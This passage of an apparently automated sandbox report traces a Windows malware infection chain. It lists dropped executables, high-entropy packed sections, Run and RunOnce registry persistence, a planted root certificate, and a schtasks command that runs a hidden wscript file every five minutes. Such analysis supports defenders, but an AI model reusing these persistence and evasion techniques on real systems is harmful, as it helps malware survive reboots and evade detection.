                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeAutomated click: OK
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: wfJfUGeGT3.exeStatic file information: File size 1411961 > 1048576
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: wfJfUGeGT3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeUnpacked PE file: 31.2.build2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeUnpacked PE file: 31.2.build2.exe.400000.0.unpack
                        Source: contorax[1].exe.11.dr, -Module-.cs.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])
                        Source: contorax.exe.11.dr, -Module-.cs.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])
                        Source: contorax[1].exe.11.drStatic PE information: 0xFA1A71C5 [Wed Dec 20 05:51:01 2102 UTC]
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406312
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                        Source: exbuild[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x6abc6
                        Source: 36f677264b.exe.11.drStatic PE information: real checksum: 0x1de45c should be: 0x1e3e45
                        Source: meta[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x2b0038
                        Source: exbuild.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x6abc6
                        Source: contorax.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x20526
                        Source: crypteda[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x11b6f1
                        Source: crypteda.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x11b6f1
                        Source: random[1].exe.11.drStatic PE information: real checksum: 0x1de45c should be: 0x1e3e45
                        Source: BowExpert.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x16389d
                        Source: BowExpert[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x16389d
                        Source: GOLD[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x5a6a4
                        Source: kitty.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x55f6e
                        Source: contorax[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x20526
                        Source: meta.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x2b0038
                        Source: GOLD.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x5a6a4
                        Source: kitty[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x55f6e
                        Source: 3546345.exe.11.drStatic PE information: section name: /4
                        Source: 3546345.exe.11.drStatic PE information: section name: /14
                        Source: 3546345.exe.11.drStatic PE information: section name: /29
                        Source: 3546345.exe.11.drStatic PE information: section name: /41
                        Source: 3546345.exe.11.drStatic PE information: section name: /55
                        Source: 3546345.exe.11.drStatic PE information: section name: /67
                        Source: 3546345.exe.11.drStatic PE information: section name: /80
                        Source: 3546345.exe.11.drStatic PE information: section name: /91
                        Source: 3546345.exe.11.drStatic PE information: section name: /102
                        Source: meta[1].exe.11.drStatic PE information: section name: .managed
                        Source: meta[1].exe.11.drStatic PE information: section name: hydrated
                        Source: meta.exe.11.drStatic PE information: section name: .managed
                        Source: meta.exe.11.drStatic PE information: section name: hydrated
                        Source: random[1].exe.11.drStatic PE information: section name:
                        Source: random[1].exe.11.drStatic PE information: section name: .idata
                        Source: random[1].exe.11.drStatic PE information: section name:
                        Source: random[1].exe.11.drStatic PE information: section name: prspuaeb
                        Source: random[1].exe.11.drStatic PE information: section name: plcvpmpk
                        Source: random[1].exe.11.drStatic PE information: section name: .taggant
                        Source: 36f677264b.exe.11.drStatic PE information: section name:
                        Source: 36f677264b.exe.11.drStatic PE information: section name: .idata
                        Source: 36f677264b.exe.11.drStatic PE information: section name:
                        Source: 36f677264b.exe.11.drStatic PE information: section name: prspuaeb
                        Source: 36f677264b.exe.11.drStatic PE information: section name: plcvpmpk
                        Source: 36f677264b.exe.11.drStatic PE information: section name: .taggant
                        Source: channel2[1].exe.11.drStatic PE information: section name: /4
                        Source: channel2[1].exe.11.drStatic PE information: section name: /14
                        Source: channel2[1].exe.11.drStatic PE information: section name: /29
                        Source: channel2[1].exe.11.drStatic PE information: section name: /41
                        Source: channel2[1].exe.11.drStatic PE information: section name: /55
                        Source: channel2[1].exe.11.drStatic PE information: section name: /67
                        Source: channel2[1].exe.11.drStatic PE information: section name: /80
                        Source: channel2[1].exe.11.drStatic PE information: section name: /91
                        Source: channel2[1].exe.11.drStatic PE information: section name: /102
                        Source: channel2.exe.11.drStatic PE information: section name: /4
                        Source: channel2.exe.11.drStatic PE information: section name: /14
                        Source: channel2.exe.11.drStatic PE information: section name: /29
                        Source: channel2.exe.11.drStatic PE information: section name: /41
                        Source: channel2.exe.11.drStatic PE information: section name: /55
                        Source: channel2.exe.11.drStatic PE information: section name: /67
                        Source: channel2.exe.11.drStatic PE information: section name: /80
                        Source: channel2.exe.11.drStatic PE information: section name: /91
                        Source: channel2.exe.11.drStatic PE information: section name: /102
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /4
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /14
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /29
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /41
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /55
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /67
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /80
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /91
                        Source: Channel1[1].exe.11.drStatic PE information: section name: /102
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D8B75 push ecx; ret 19_2_005D8B88
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005CCBF1 push eax; retf 19_2_005CCBF8
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB2808 push ds; retf 24_2_00CB280B
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB280D push ds; retf 24_2_00CB281B
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB02B4 push ecx; ret 24_2_00CB02C7
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_007502B4 push ecx; ret 27_2_007502C7
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0042136C push ecx; ret 31_2_0042137F
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02A147F0 pushad ; iretd 31_2_02A147FD
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02A12448 pushad ; retn 0009h31_2_02A12455
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B115D3 push ecx; ret 31_2_02B115E6
                        Source: GOLD[1].exe.11.drStatic PE information: section name: .text entropy: 7.994093571693808
                        Source: GOLD.exe.11.drStatic PE information: section name: .text entropy: 7.994093571693808
                        Source: crypteda[1].exe.11.drStatic PE information: section name: .text entropy: 7.99930616062516
                        Source: crypteda.exe.11.drStatic PE information: section name: .text entropy: 7.99930616062516
                        Source: random[1].exe.11.drStatic PE information: section name: entropy: 7.984181684209861
                        Source: random[1].exe.11.drStatic PE information: section name: prspuaeb entropy: 7.952080487660967
                        Source: 36f677264b.exe.11.drStatic PE information: section name: entropy: 7.984181684209861
                        Source: 36f677264b.exe.11.drStatic PE information: section name: prspuaeb entropy: 7.952080487660967
                        Source: build2[1].exe.11.drStatic PE information: section name: .text entropy: 7.725782681688218
                        Source: build2.exe.11.drStatic PE information: section name: .text entropy: 7.725782681688218

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrJump to dropped file
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeFile created: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeFile created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exeJump to dropped file
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile created: C:\Users\user\Windows.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exeJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeFile created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeFile created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeJump to dropped file
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile created: C:\Users\user\Windows.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile created: C:\Users\user\Windows.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.urlJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeFile created: C:\Windows\Tasks\Hkbsse.job
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.urlJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_006359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_006359B3
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_005C5EDA
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_005D33B7
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess information set: NOOPENFILEERRORBOX
